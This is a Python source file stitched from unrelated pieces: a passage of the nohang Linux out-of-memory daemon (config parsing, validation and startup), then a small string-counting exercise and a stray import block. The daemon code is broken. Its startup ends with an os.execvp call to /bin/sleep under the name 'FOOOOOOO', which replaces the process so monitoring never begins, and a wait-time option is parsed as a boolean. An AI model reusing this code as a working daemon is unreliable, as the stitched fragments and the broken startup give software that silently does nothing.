            'Shmem: {} MiB)'.format(
                anon_rss,
                file_rss,
                shmem_rss)
    else:
        detailed_rss_info = ''
    victim_info = 'Victim status (found in {} ms):' \
        '\n Name: {}' \
        '\n State: {}' \
        '\n PID: {}' \
        '\n{}' \
        '\n EUID: {}' \
        '\n badness: {}, ' \
        'oom_score: {}, ' \
        'oom_score_adj: {}' \
        '\n VmSize: {} MiB' \
        '\n VmRSS: {} MiB {}' \
        '\n VmSwap: {} MiB' \
        '\n CGroup_systemd: {}' \
        '\n CGroup_unified: {}' \
        '\n SID: {} ({})' \
        '\n Realpath: {}' \
        '\n Cwd: {}' \
        '{}{}' \
        '\n Lifetime: {}'.format(
            round((monotonic() - status0) * 1000),
            name,
            state,
            pid,
            ancestry,
            uid,
            victim_badness,
            oom_score,
            oom_score_adj,
            vm_size,
            str(vm_rss).rjust(len_vm),
            detailed_rss_info,
            str(vm_swap).rjust(len_vm),
            victim_cgroup_systemd,
            victim_cgroup_unified,
            sid, pid_to_name(sid),
            realpath,
            cwd,
            c1, cmdline,
            victim_lifetime)
    return victim_info
###########################################################################################################################
###########################################################################################################################
###########################################################################################################################
###########################################################################################################################
###########################################################################################################################
start_time = monotonic()
# CLI help text printed for -h/--help
help_mess = """usage: nohang [-h] [-v] [-p] [-c CONFIG] [-cc CONFIG]
optional arguments:
-h, --help show this help message and exit
-v, --version print version
-p, --print-proc-table
print table of processes with their badness values
-c CONFIG, --config CONFIG
path to the config file, default values:
./nohang.conf, /etc/nohang/nohang.conf
-cc CONFIG, --check-config CONFIG
check and print config"""
# clock ticks/sec and page size, needed to interpret /proc values
SC_CLK_TCK = os.sysconf(os.sysconf_names['SC_CLK_TCK'])
SC_PAGESIZE = os.sysconf(os.sysconf_names['SC_PAGESIZE'])  # is this used?
# TODO: rework all of this into: ERROR: invalid config: ...
conf_err_mess = 'Invalid config. Exit.'
sig_list = [SIGTERM, SIGINT, SIGQUIT, SIGHUP]
sig_dict = {
    SIGKILL: 'SIGKILL',
    SIGINT: 'SIGINT',
    SIGQUIT: 'SIGQUIT',
    SIGHUP: 'SIGHUP',
    SIGTERM: 'SIGTERM'
}
self_pid = str(os.getpid())
self_uid = os.geteuid()
# running as root unlocks actions on other users' processes
if self_uid == 0:
    root = True
else:
    root = False
# prefer a helper binary next to us, otherwise rely on PATH
if os.path.exists('./nohang_notify_helper'):
    notify_helper_path = './nohang_notify_helper'
else:
    notify_helper_path = 'nohang_notify_helper'
# {victim_id: {'time': timestamp, 'name': name}}
v_dict = dict()
last_action_dict = dict()
last_action_dict['t'] = monotonic()
# will store corrective actions stat
stat_dict = dict()
separate_log = False  # will be overwritten after parse config
cgroup_systemd_index, cgroup_unified_index = find_cgroup_indexes()
pid_list = get_pid_list()
non_decimal_list = get_non_decimal_pids()
print_proc_table_flag = False
check_config_flag = False
# default config location: cwd first, then /etc
if os.path.exists('./nohang.conf'):
    config = os.getcwd() + '/nohang.conf'
else:
    config = '/etc/nohang/nohang.conf'
# hand-rolled CLI parsing (argv from sys)
if len(argv) == 1:
    pass
elif len(argv) == 2:
    # single-flag forms
    if argv[1] == '--help' or argv[1] == '-h':
        print(help_mess)
        exit()
    elif argv[1] == '--check-config' or argv[1] == '-cc':
        check_config_flag = True
    elif argv[1] == '--version' or argv[1] == '-v':
        print_version()
    elif argv[1] == '--print-proc-table' or argv[1] == '-p':
        print_proc_table_flag = True
        if os.path.exists('./nohang.conf'):
            config = os.getcwd() + '/nohang.conf'
        else:
            config = '/etc/nohang/nohang.conf'
    else:
        errprint('Unknown option: {}'.format(argv[1]))
        exit(1)
elif len(argv) == 3:
    # flag + value forms (both take a config path)
    if argv[1] == '--config' or argv[1] == '-c':
        config = argv[2]
    elif argv[1] == '--check-config' or argv[1] == '-cc':
        config = argv[2]
        check_config_flag = True
    else:
        errprint('Unknown option: {}'.format(argv[1]))
        exit(1)
else:
    errprint('Invalid CLI input: too many options')
    exit(1)
# find mem_total
# find positions of SwapFree and SwapTotal in /proc/meminfo
with open('/proc/meminfo') as f:
    mem_list = f.readlines()
# field names in file order (MemTotal, MemFree, MemAvailable, ...)
mem_list_names = [s.split(':')[0] for s in mem_list]
# MemAvailable (3rd field) exists since Linux 3.14
if mem_list_names[2] != 'MemAvailable':
    # FIX: typo in the user-facing message ('requied' -> 'required')
    errprint('WARNING: Your Linux kernel is too old, Linux 3.14+ required')
    exit(1)
swap_total_index = mem_list_names.index('SwapTotal')
swap_free_index = swap_total_index + 1
# MemTotal value in KiB (strip the trailing ' kB\n')
mem_total = int(mem_list[0].split(':')[1][:-4])
# Get names from /proc/*/status to be able to get VmRSS and VmSwap values
with open('/proc/self/status') as file:
    status_list = file.readlines()
status_names = []
for s in status_list:
    status_names.append(s.split(':')[0])
# line numbers of the fields we parse later per process
ppid_index = status_names.index('PPid')
vm_size_index = status_names.index('VmSize')
vm_rss_index = status_names.index('VmRSS')
vm_swap_index = status_names.index('VmSwap')
uid_index = status_names.index('Uid')
state_index = status_names.index('State')
try:
    # RssAnon/RssFile/RssShmem appeared in Linux 4.5
    anon_index = status_names.index('RssAnon')
    file_index = status_names.index('RssFile')
    shmem_index = status_names.index('RssShmem')
    detailed_rss = True
    # print(detailed_rss, 'detailed_rss')
except ValueError:
    detailed_rss = False
    # print('It is not Linux 4.5+')
log('config: ' + config)
###############################################################################
# parsing the config with obtaining the parameters dictionary
# conf_parameters_dict
# conf_restart_dict
# dictionary with config options
config_dict = dict()
# rule lists filled from the @-directives in the config file
badness_adj_re_name_list = []
badness_adj_re_cmdline_list = []
badness_adj_re_environ_list = []
badness_adj_re_uid_list = []
badness_adj_re_cgroup_systemd_list = []
badness_adj_re_cgroup_unified_list = []
badness_adj_re_realpath_list = []
badness_adj_re_cwd_list = []
soft_actions_list = []
kill_session_regex_sid_name_list = []
custom_action_re_cgroup_unified_list = []
custom_action_re_cgroup_systemd_list = []
# separator for optional parameters (that starts with @)
opt_separator = '///'
kill_group_separator = '[KILL_GROUP]'
try:
with open(config) as f:
for line in f:
a = line.startswith('#')
b = line.startswith('\n')
c = line.startswith('\t')
d = line.startswith(' ')
etc = line.startswith('@SOFT_ACTION_RE_NAME')
etc2 = line.startswith('@SOFT_ACTION_RE_CGROUP_SYSTEMD')
etc3 = line.startswith('@KILL_SESSION_REGEX_SID_NAME')
etc4 = line.startswith('@CUSTOM_ACTION_RE_CGROUP_UNIFIED')
etc5 = line.startswith('@CUSTOM_ACTION_RE_CGROUP_SYSTEMD')
if not a and not b and not c and not d and not etc and not etc2 and not etc3 and not etc4 and not etc5:
a = line.partition('=')
key = a[0].strip()
value = a[2].strip()
if key not in config_dict:
config_dict[key] = value
else:
log('ERROR: config key duplication: {}'.format(key))
exit(1)
if etc:
a = line.partition('@SOFT_ACTION_RE_NAME')[
2].partition(opt_separator)
a1 = 'name'
a2 = a[0].strip()
valid_re(a2)
a3 = a[2].strip()
zzz = (a1, a2, a3)
soft_actions_list.append(zzz)
if etc2:
a = line.partition('@SOFT_ACTION_RE_CGROUP_SYSTEMD')[
2].partition(opt_separator)
a1 = 'cgroup_systemd'
a2 = a[0].strip()
valid_re(a2)
a3 = a[2].strip()
zzz = (a1, a2, a3)
soft_actions_list.append(zzz)
if etc3:
a = line.partition('@KILL_SESSION_REGEX_SID_NAME')
kill_session_regex_sid_name_list.append(a[2].strip())
if etc4:
a = line.partition('@CUSTOM_ACTION_RE_CGROUP_UNIFIED')
b = a[2].strip()
if opt_separator in b:
b = b.partition(opt_separator)
rega = b[0].strip()
cmd = b[2].strip()
if cmd.startswith(kill_group_separator):
kill = True
cmd = cmd.partition(kill_group_separator)[2].strip()
else:
kill = False
custom_action_re_cgroup_unified_list.append(
(rega, kill, cmd))
if etc5:
a = line.partition('@CUSTOM_ACTION_RE_CGROUP_SYSTEMD')
b = a[2].strip()
if opt_separator in b:
b = b.partition(opt_separator)
rega = b[0].strip()
cmd = b[2].strip()
if cmd.startswith(kill_group_separator):
kill = True
cmd = cmd.partition(kill_group_separator)[2].strip()
else:
kill = False
custom_action_re_cgroup_systemd_list.append(
(rega, kill, cmd))
if line.startswith('@BADNESS_ADJ_RE_NAME'):
a = line.partition('@BADNESS_ADJ_RE_NAME')[2].strip(
' \n').partition(opt_separator)
badness_adj = a[0].strip(' ')
reg_exp = a[2].strip(' ')
valid_re(reg_exp)
badness_adj_re_name_list.append((badness_adj, reg_exp))
if line.startswith('@BADNESS_ADJ_RE_CMDLINE'):
a = line.partition('@BADNESS_ADJ_RE_CMDLINE')[2].strip(
' \n').partition(opt_separator)
badness_adj = a[0].strip(' ')
reg_exp = a[2].strip(' ')
valid_re(reg_exp)
badness_adj_re_cmdline_list.append((badness_adj, reg_exp))
if line.startswith('@BADNESS_ADJ_RE_UID'):
a = line.partition('@BADNESS_ADJ_RE_UID')[2].strip(
' \n').partition(opt_separator)
badness_adj = a[0].strip(' ')
reg_exp = a[2].strip(' ')
valid_re(reg_exp)
badness_adj_re_uid_list.append((badness_adj, reg_exp))
if line.startswith('@BADNESS_ADJ_RE_CGROUP_SYSTEMD'):
a = line.partition('@BADNESS_ADJ_RE_CGROUP_SYSTEMD')[2].strip(
' \n').partition(opt_separator)
badness_adj = a[0].strip(' ')
reg_exp = a[2].strip(' ')
valid_re(reg_exp)
badness_adj_re_cgroup_systemd_list.append(
(badness_adj, reg_exp))
if line.startswith('@BADNESS_ADJ_RE_CGROUP_UNIFIED'):
a = line.partition('@BADNESS_ADJ_RE_CGROUP_UNIFIED')[2].strip(
' \n').partition(opt_separator)
badness_adj = a[0].strip(' ')
reg_exp = a[2].strip(' ')
valid_re(reg_exp)
badness_adj_re_cgroup_unified_list.append(
(badness_adj, reg_exp))
if line.startswith('@BADNESS_ADJ_RE_REALPATH'):
a = line.partition('@BADNESS_ADJ_RE_REALPATH')[2].strip(
' \n').partition(opt_separator)
badness_adj = a[0].strip(' ')
reg_exp = a[2].strip(' ')
valid_re(reg_exp)
badness_adj_re_realpath_list.append((badness_adj, reg_exp))
if line.startswith('@BADNESS_ADJ_RE_CWD'):
a = line.partition('@BADNESS_ADJ_RE_CWD')[2].strip(
' \n').partition(opt_separator)
badness_adj = a[0].strip(' ')
reg_exp = a[2].strip(' ')
valid_re(reg_exp)
badness_adj_re_cwd_list.append((badness_adj, reg_exp))
if line.startswith('@BADNESS_ADJ_RE_ENVIRON'):
a = line.partition('@BADNESS_ADJ_RE_ENVIRON')[2].strip(
' \n').partition(opt_separator)
badness_adj = a[0].strip(' ')
reg_exp = a[2].strip(' ')
valid_re(reg_exp)
badness_adj_re_environ_list.append((badness_adj, reg_exp))
except PermissionError:
errprint('PermissionError', conf_err_mess)
exit(1)
except UnicodeDecodeError:
errprint('UnicodeDecodeError', conf_err_mess)
exit(1)
except IsADirectoryError:
errprint('IsADirectoryError', conf_err_mess)
exit(1)
except IndexError:
errprint('IndexError', conf_err_mess)
exit(1)
except FileNotFoundError:
errprint('FileNotFoundError', conf_err_mess)
exit(1)
# Collapse each rule list into a boolean feature flag: a matcher is
# enabled only when the config supplied at least one rule of that kind.
# (Idiom: `flag = bool(lst)` replaces twelve `if lst == []:` blocks.)
regex_matching = bool(badness_adj_re_name_list)
re_match_cmdline = bool(badness_adj_re_cmdline_list)
re_match_uid = bool(badness_adj_re_uid_list)
re_match_environ = bool(badness_adj_re_environ_list)
re_match_realpath = bool(badness_adj_re_realpath_list)
re_match_cwd = bool(badness_adj_re_cwd_list)
re_match_cgroup_systemd = bool(badness_adj_re_cgroup_systemd_list)
re_match_cgroup_unified = bool(badness_adj_re_cgroup_unified_list)
soft_actions = bool(soft_actions_list)
kill_session_enabled = bool(kill_session_regex_sid_name_list)
custom_action_re_cgroup_unified = bool(custom_action_re_cgroup_unified_list)
# NOTE(review): the two prints below look like leftover debug output —
# consider routing them through log() or removing them
print(custom_action_re_cgroup_unified_list, custom_action_re_cgroup_unified)
custom_action_re_cgroup_systemd = bool(custom_action_re_cgroup_systemd_list)
print(custom_action_re_cgroup_systemd_list, custom_action_re_cgroup_systemd)
###############################################################################
# extracting parameters from the dictionary
# check for all necessary parameters
# validation of all parameters
debug_psi = conf_parse_bool('debug_psi')
print_statistics = conf_parse_bool('print_statistics')
print_proc_table = conf_parse_bool('print_proc_table')
###############################################################################
# 3
print_victim_status = conf_parse_bool('print_victim_status')
print_victim_cmdline = conf_parse_bool('print_victim_cmdline')
print_config_at_startup = conf_parse_bool('print_config_at_startup')
print_mem_check_results = conf_parse_bool('print_mem_check_results')
debug_sleep = conf_parse_bool('debug_sleep')
kill_shell_sessions_group = conf_parse_bool('kill_shell_sessions_group')
# NOTE(review): a *time* option parsed as bool — confirm this is intended
max_kill_wait_time = conf_parse_bool('max_kill_wait_time')
hide_corrective_action_type = conf_parse_bool('hide_corrective_action_type')
low_memory_warnings_enabled = conf_parse_bool('low_memory_warnings_enabled')
post_action_gui_notifications = conf_parse_bool(
    'post_action_gui_notifications')
debug_threading = conf_parse_bool('debug_threading')
psi_checking_enabled = conf_parse_bool('psi_checking_enabled')
ignore_psi = not psi_checking_enabled
zram_checking_enabled = conf_parse_bool('zram_checking_enabled')
ignore_zram = not zram_checking_enabled
debug_gui_notifications = conf_parse_bool('debug_gui_notifications')
ignore_positive_oom_score_adj = conf_parse_bool(
    'ignore_positive_oom_score_adj')
# each threshold option is expanded into (KiB, MiB, percent) triples
(soft_threshold_min_mem_kb, soft_threshold_min_mem_mb,
    soft_threshold_min_mem_percent) = calculate_percent('soft_threshold_min_mem')
(hard_threshold_min_mem_kb, hard_threshold_min_mem_mb,
    hard_threshold_min_mem_percent) = calculate_percent('hard_threshold_min_mem')
(soft_threshold_max_zram_kb, soft_threshold_max_zram_mb,
    soft_threshold_max_zram_percent) = calculate_percent('soft_threshold_max_zram')
(hard_threshold_max_zram_kb, hard_threshold_max_zram_mb,
    hard_threshold_max_zram_percent) = calculate_percent('hard_threshold_max_zram')
(warning_threshold_min_mem_kb, warning_threshold_min_mem_mb,
    warning_threshold_min_mem_percent) = calculate_percent('warning_threshold_min_mem')
(warning_threshold_max_zram_kb, warning_threshold_max_zram_mb,
    warning_threshold_max_zram_percent) = calculate_percent('warning_threshold_max_zram')
# required float options; each is validated and the daemon exits on a
# missing or malformed value
if 'post_zombie_delay' in config_dict:
    post_zombie_delay = string_to_float_convert_test(
        config_dict['post_zombie_delay'])
    if post_zombie_delay is None:
        errprint('Invalid post_zombie_delay, not float\nExit')
        exit(1)
    if post_zombie_delay < 0:
        errprint('post_zombie_delay MUST be >= 0\nExit')
        exit(1)
else:
    errprint('post_zombie_delay not in config\nExit')
    exit(1)
if 'victim_cache_time' in config_dict:
    victim_cache_time = string_to_float_convert_test(
        config_dict['victim_cache_time'])
    if victim_cache_time is None:
        errprint('Invalid victim_cache_time, not float\nExit')
        exit(1)
    if victim_cache_time < 0:
        errprint('victim_cache_time MUST be >= 0\nExit')
        exit(1)
else:
    errprint('victim_cache_time not in config\nExit')
    exit(1)
if 'env_cache_time' in config_dict:
    env_cache_time = string_to_float_convert_test(
        config_dict['env_cache_time'])
    if env_cache_time is None:
        errprint('Invalid env_cache_time value, not float\nExit')
        exit(1)
    if env_cache_time < 0:
        errprint('env_cache_time MUST be >= 0\nExit')
        exit(1)
else:
    errprint('env_cache_time not in config\nExit')
    exit(1)
if 'exe_timeout' in config_dict:
    exe_timeout = string_to_float_convert_test(
        config_dict['exe_timeout'])
    if exe_timeout is None:
        errprint('Invalid exe_timeout value, not float\nExit')
        exit(1)
    if exe_timeout <= 0:
        errprint('exe_timeout MUST be > 0\nExit')
        exit(1)
else:
    errprint('exe_timeout not in config\nExit')
    exit(1)
# fill rate options: strictly positive floats
if 'fill_rate_mem' in config_dict:
    fill_rate_mem = string_to_float_convert_test(config_dict['fill_rate_mem'])
    if fill_rate_mem is None:
        errprint('Invalid fill_rate_mem value, not float\nExit')
        exit(1)
    if fill_rate_mem <= 0:
        errprint('fill_rate_mem MUST be > 0\nExit')
        exit(1)
else:
    errprint('fill_rate_mem not in config\nExit')
    exit(1)
if 'fill_rate_swap' in config_dict:
    fill_rate_swap = string_to_float_convert_test(
        config_dict['fill_rate_swap'])
    if fill_rate_swap is None:
        errprint('Invalid fill_rate_swap value, not float\nExit')
        exit(1)
    if fill_rate_swap <= 0:
        errprint('fill_rate_swap MUST be > 0\nExit')
        exit(1)
else:
    errprint('fill_rate_swap not in config\nExit')
    exit(1)
if 'fill_rate_zram' in config_dict:
    fill_rate_zram = string_to_float_convert_test(
        config_dict['fill_rate_zram'])
    if fill_rate_zram is None:
        errprint('Invalid fill_rate_zram value, not float\nExit')
        exit(1)
    if fill_rate_zram <= 0:
        errprint('fill_rate_zram MUST be > 0\nExit')
        exit(1)
else:
    errprint('fill_rate_zram not in config\nExit')
    exit(1)
# swap thresholds stay as raw strings here; interpreted later
if 'soft_threshold_min_swap' in config_dict:
    soft_threshold_min_swap = config_dict['soft_threshold_min_swap']
else:
    errprint('soft_threshold_min_swap not in config\nExit')
    exit(1)
if 'hard_threshold_min_swap' in config_dict:
    hard_threshold_min_swap = config_dict['hard_threshold_min_swap']
else:
    errprint('hard_threshold_min_swap not in config\nExit')
    exit(1)
if 'post_soft_action_delay' in config_dict:
    post_soft_action_delay = string_to_float_convert_test(
        config_dict['post_soft_action_delay'])
    if post_soft_action_delay is None:
        errprint('Invalid post_soft_action_delay value, not float\nExit')
        exit(1)
    if post_soft_action_delay < 0:
        # FIX: the old message said 'must be positiv' — a typo, and
        # wrong: the check accepts 0, so the value must be non-negative
        errprint('post_soft_action_delay must be non-negative\nExit')
        exit(1)
else:
    errprint('post_soft_action_delay not in config\nExit')
    exit(1)
# PSI (pressure stall information) related options
if 'psi_post_action_delay' in config_dict:
    psi_post_action_delay = string_to_float_convert_test(
        config_dict['psi_post_action_delay'])
    if psi_post_action_delay is None:
        errprint('Invalid psi_post_action_delay value, not float\nExit')
        exit(1)
    if psi_post_action_delay < 0:
        errprint('psi_post_action_delay must be positive\nExit')
        exit(1)
else:
    errprint('psi_post_action_delay not in config\nExit')
    exit(1)
# PSI thresholds are percentages in [0; 100]
if 'hard_threshold_max_psi' in config_dict:
    hard_threshold_max_psi = string_to_float_convert_test(
        config_dict['hard_threshold_max_psi'])
    if hard_threshold_max_psi is None:
        errprint('Invalid hard_threshold_max_psi value, not float\nExit')
        exit(1)
    if hard_threshold_max_psi < 0 or hard_threshold_max_psi > 100:
        errprint('hard_threshold_max_psi must be in the range [0; 100]\nExit')
        exit(1)
else:
    errprint('hard_threshold_max_psi not in config\nExit')
    exit(1)
if 'soft_threshold_max_psi' in config_dict:
    soft_threshold_max_psi = string_to_float_convert_test(
        config_dict['soft_threshold_max_psi'])
    if soft_threshold_max_psi is None:
        errprint('Invalid soft_threshold_max_psi value, not float\nExit')
        exit(1)
    if soft_threshold_max_psi < 0 or soft_threshold_max_psi > 100:
        errprint('soft_threshold_max_psi must be in the range [0; 100]\nExit')
        exit(1)
else:
    errprint('soft_threshold_max_psi not in config\nExit')
    exit(1)
if 'warning_threshold_max_psi' in config_dict:
    warning_threshold_max_psi = string_to_float_convert_test(
        config_dict['warning_threshold_max_psi'])
    if warning_threshold_max_psi is None:
        errprint('Invalid warning_threshold_max_psi value, not float\nExit')
        exit(1)
    if warning_threshold_max_psi < 0 or warning_threshold_max_psi > 100:
        errprint(
            'warning_threshold_max_psi must be in the range [0; 100]\nExit')
        exit(1)
else:
    errprint('warning_threshold_max_psi not in config\nExit')
    exit(1)
if 'min_badness' in config_dict:
    min_badness = string_to_int_convert_test(
        config_dict['min_badness'])
    if min_badness is None:
        errprint('Invalid min_badness value, not integer\nExit')
        exit(1)
    # badness is bounded by the kernel's oom_score range
    if min_badness < 0 or min_badness > 1000:
        # FIX: typo in the user-facing message ('Invalud' -> 'Invalid')
        errprint('Invalid min_badness value\nExit')
        exit(1)
else:
    errprint('min_badness not in config\nExit')
    exit(1)
if 'min_post_warning_delay' in config_dict:
    min_post_warning_delay = string_to_float_convert_test(
        config_dict['min_post_warning_delay'])
    if min_post_warning_delay is None:
        errprint('Invalid min_post_warning_delay value, not float\nExit')
        exit(1)
    if min_post_warning_delay < 1 or min_post_warning_delay > 300:
        errprint('min_post_warning_delay value out of range [1; 300]\nExit')
        exit(1)
else:
    errprint('min_post_warning_delay not in config\nExit')
    exit(1)
# kept as a raw string; interpreted later
if 'warning_threshold_min_swap' in config_dict:
    warning_threshold_min_swap = config_dict['warning_threshold_min_swap']
else:
    errprint('warning_threshold_min_swap not in config\nExit')
    exit(1)
if 'max_victim_ancestry_depth' in config_dict:
    max_victim_ancestry_depth = string_to_int_convert_test(
        config_dict['max_victim_ancestry_depth'])
    # BUGFIX: the original tested `min_badness is None` here (copy-paste
    # from the min_badness block), so a malformed value was never caught
    # and the `< 1` comparison below would raise TypeError on None.
    if max_victim_ancestry_depth is None:
        errprint('Invalid max_victim_ancestry_depth value, not integer\nExit')
        exit(1)
    if max_victim_ancestry_depth < 1:
        # FIX: typo in the user-facing message ('Invalud' -> 'Invalid')
        errprint('Invalid max_victim_ancestry_depth value\nExit')
        exit(1)
else:
    errprint('max_victim_ancestry_depth is not in config\nExit')
    exit(1)
# how long to wait for a victim to exit after a soft (SIGTERM) action
if 'max_soft_exit_time' in config_dict:
    max_soft_exit_time = string_to_float_convert_test(
        config_dict['max_soft_exit_time'])
    if max_soft_exit_time is None:
        errprint('Invalid max_soft_exit_time val'
                 'ue, not float\nExit')
        exit(1)
    if max_soft_exit_time < 0:
        errprint('max_soft_exit_time must be non-n'
                 'egative number\nExit')
        exit(1)
else:
    errprint('max_soft_exit_time is not in config\nExit')
    exit(1)
# string-valued options taken as-is
if 'psi_path' in config_dict:
    psi_path = config_dict['psi_path']
else:
    errprint('psi_path is not in config\nExit')
    exit(1)
if 'psi_metrics' in config_dict:
    psi_metrics = config_dict['psi_metrics']
else:
    errprint('psi_metrics is not in config\nExit')
    exit(1)
# empty warning_exe disables running an external warning command
if 'warning_exe' in config_dict:
    warning_exe = config_dict['warning_exe']
    if warning_exe != '':
        check_warning_exe = True
    else:
        check_warning_exe = False
else:
    errprint('warning_exe is not in config\nExit')
    exit(1)
if 'extra_table_info' in config_dict:
    extra_table_info = config_dict['extra_table_info']
    # idiom: tuple membership instead of a chain of '!=' comparisons
    if extra_table_info not in ('None', 'cgroup_systemd', 'cgroup_unified',
                                'cmdline', 'environ', 'realpath', 'cwd'):
        errprint('Invalid config: invalid extra_table_info value\nExit')
        exit(1)
else:
    errprint('Invalid config: extra_table_info is not in config\nExit')
    exit(1)
separate_log = conf_parse_bool('separate_log')
if separate_log:
    # lazily import logging only when a separate log file is wanted
    import logging
    log_dir = '/var/log/nohang'
    logfile = log_dir + '/nohang.log'
    try:
        os.mkdir(log_dir)
    except FileExistsError:
        pass
    except PermissionError:
        errprint('ERROR: cannot create {}'.format(log_dir))
    try:
        os.chmod(log_dir, mode=0o750)
    except FileNotFoundError:
        errprint('ERROR: file not found: {}'.format(log_dir))
    except PermissionError:
        errprint('ERROR: permission denied: {}'.format(log_dir))
    try:
        logging.basicConfig(
            filename=logfile,
            level=logging.INFO,
            format="%(asctime)s: %(message)s")
    except FileNotFoundError:
        errprint('ERROR: file not found: {}'.format(logfile))
    except PermissionError:
        errprint('ERROR: permission denied: {}'.format(logfile))
# --- polling / reporting intervals (seconds) ------------------------------
# Same validation pattern for every option: present, parses as float, in range.
if 'min_mem_report_interval' not in config_dict:
    errprint('min_mem_report_interval is not in config\nExit')
    exit(1)
min_mem_report_interval = string_to_float_convert_test(
    config_dict['min_mem_report_interval'])
if min_mem_report_interval is None:
    errprint('Invalid min_mem_report_interval value, not float\nExit')
    exit(1)
if min_mem_report_interval < 0:
    errprint('min_mem_report_interval must be non-negative number\nExit')
    exit(1)
if 'psi_excess_duration' not in config_dict:
    errprint('psi_excess_duration is not in config\nExit')
    exit(1)
psi_excess_duration = string_to_float_convert_test(
    config_dict['psi_excess_duration'])
if psi_excess_duration is None:
    errprint('Invalid psi_excess_duration value, not float\nExit')
    exit(1)
if psi_excess_duration < 0:
    errprint('psi_excess_duration must be non-negative number\nExit')
    exit(1)
# The three sleep settings must be strictly positive.
if 'max_sleep' not in config_dict:
    errprint('max_sleep is not in config\nExit')
    exit(1)
max_sleep = string_to_float_convert_test(
    config_dict['max_sleep'])
if max_sleep is None:
    errprint('Invalid max_sleep value, not float\nExit')
    exit(1)
if max_sleep <= 0:
    errprint('max_sleep must be positive number\nExit')
    exit(1)
if 'min_sleep' not in config_dict:
    errprint('min_sleep is not in config\nExit')
    exit(1)
min_sleep = string_to_float_convert_test(
    config_dict['min_sleep'])
if min_sleep is None:
    errprint('Invalid min_sleep value, not float\nExit')
    exit(1)
if min_sleep <= 0:
    errprint('min_sleep must be positive number\nExit')
    exit(1)
if 'over_sleep' not in config_dict:
    errprint('over_sleep is not in config\nExit')
    exit(1)
over_sleep = string_to_float_convert_test(
    config_dict['over_sleep'])
if over_sleep is None:
    errprint('Invalid over_sleep value, not float\nExit')
    exit(1)
if over_sleep <= 0:
    errprint('over_sleep must be positive number\nExit')
    exit(1)
# Probe interval for responsiveness testing: half of the oversleep budget.
sensitivity_test_time = over_sleep / 2
# Enforce over_sleep <= min_sleep <= max_sleep.
if max_sleep < min_sleep:
    errprint('min_sleep value must not exceed max_sleep value.\nExit')
    exit(1)
if min_sleep < over_sleep:
    errprint('over_sleep value must not exceed min_sleep value.\nExit')
    exit(1)
# With equal bounds the sleep period is fixed and never recomputed.
if max_sleep == min_sleep:
    stable_sleep = True
else:
    stable_sleep = False
if print_proc_table_flag:
    if not root:
        log('WARNING: effective UID != 0; euid={}; processes with other e'
            'uids will be invisible for nohang'.format(self_uid))
    func_print_proc_table()
##########################################################################
# These features spawn external helpers / notification threads, so the
# subprocess machinery is imported only when at least one is enabled.
if (low_memory_warnings_enabled or
        post_action_gui_notifications or
        check_warning_exe or
        soft_actions):
    import threading
    import shlex
    from subprocess import Popen, TimeoutExpired
psi_support = os.path.exists(psi_path)
##########################################################################
# Get KiB levels if it's possible.
# Each tuple is (value, is_percent) as returned by get_swap_threshold_tuple.
soft_threshold_min_swap_tuple = get_swap_threshold_tuple(
    soft_threshold_min_swap)
hard_threshold_min_swap_tuple = get_swap_threshold_tuple(
    hard_threshold_min_swap)
warning_threshold_min_swap_tuple = get_swap_threshold_tuple(
    warning_threshold_min_swap)
# Collects the thresholds that were given in absolute KiB (not %).
swap_kb_dict = dict()
swap_term_is_percent = soft_threshold_min_swap_tuple[1]
if swap_term_is_percent:
    soft_threshold_min_swap_percent = soft_threshold_min_swap_tuple[0]
else:
    soft_threshold_min_swap_kb = soft_threshold_min_swap_tuple[0]
    swap_kb_dict['soft_threshold_min_swap_kb'] = soft_threshold_min_swap_kb
swap_kill_is_percent = hard_threshold_min_swap_tuple[1]
if swap_kill_is_percent:
    hard_threshold_min_swap_percent = hard_threshold_min_swap_tuple[0]
else:
    hard_threshold_min_swap_kb = hard_threshold_min_swap_tuple[0]
    swap_kb_dict['hard_threshold_min_swap_kb'] = hard_threshold_min_swap_kb
swap_warn_is_percent = warning_threshold_min_swap_tuple[1]
if swap_warn_is_percent:
    warning_threshold_min_swap_percent = warning_threshold_min_swap_tuple[0]
else:
    warning_threshold_min_swap_kb = warning_threshold_min_swap_tuple[0]
    swap_kb_dict['warning_threshold_min_swap_kb'
                 ] = warning_threshold_min_swap_kb
##########################################################################
# One-shot config dump / validation modes.
if print_config_at_startup or check_config_flag:
    check_config()
##########################################################################
# for calculating the column width when printing mem and zram
mem_len = len(str(round(mem_total / 1024.0)))
if post_action_gui_notifications:
    # Verb shown in GUI notifications, keyed by the signal that was sent.
    notify_sig_dict = {SIGKILL: 'Killing',
                       SIGTERM: 'Terminating'}
# convert rates from MiB/s to KiB/s
fill_rate_mem = fill_rate_mem * 1024
fill_rate_swap = fill_rate_swap * 1024
fill_rate_zram = fill_rate_zram * 1024
warn_time_now = 0
warn_time_delta = 1000  # ?
warn_timer = 0
##########################################################################
if not root:
    log('WARNING: effective UID != 0; euid={}; processes with other e'
        'uids will be invisible for nohang'.format(self_uid))
# Try to lock all memory
mlockall()
##########################################################################
# print_self_rss()
psi_avg_string = ''  # will be overwritten if PSI monitoring enabled
mem_used_zram = 0
if print_mem_check_results:
    # to find delta mem
    wt2 = 0
    new_mem = 0
    # init mem report interval
    report0 = 0
# handle signals
for i in sig_list:
    signal(i, signal_handler)
psi_timestamp0 = monotonic()
psi_delta0 = 0
threshold = None
mem_info = None
CHECK_PSI = False
if psi_support and not ignore_psi:
    CHECK_PSI = True
    hard_threshold_psi_exceeded_timer = 0
    soft_threshold_psi_exceeded_timer = 0
psi_threshold = zram_threshold = zram_info = psi_info = None
CHECK_ZRAM = not ignore_zram
log('Monitoring has started!')
stdout.flush()
# Prefixes searched in /proc/<pid>/environ to find a GUI session for
# desktop notifications.
display_env = 'DISPLAY='
dbus_env = 'DBUS_SESSION_BUS_ADDRESS='
user_env = 'USER='
envd = dict()
envd['list_with_envs'] = envd['t'] = None
cmd_num_dict = dict()
cmd_num_dict['cmd_num'] = 0
m0 = monotonic()
pt0 = process_time()
##########################################################################
# NOTE(review): os.execvp REPLACES this process with /bin/sleep, so nothing
# after this line ever runs -- this looks like leftover debugging
# scaffolding ('FOOOOOOO' argv[0]); confirm before keeping.
os.execvp('/bin/sleep', ['FOOOOOOO', '999'])
|
'''
Created on Jan 24, 2016
@author: Andrei Padnevici
@note: This is an exercise: 6.4
'''
# BUG FIX: the original bound the prompt result to the name `str`, shadowing
# the builtin str type for the rest of the module.
text = input("Please enter a string: ")
char = input("Please enter a character: ")
# Print how many times the character occurs in the entered string.
print(text.count(char))
import json
import os
import sys
import pandas.io.sql as psql
import requests
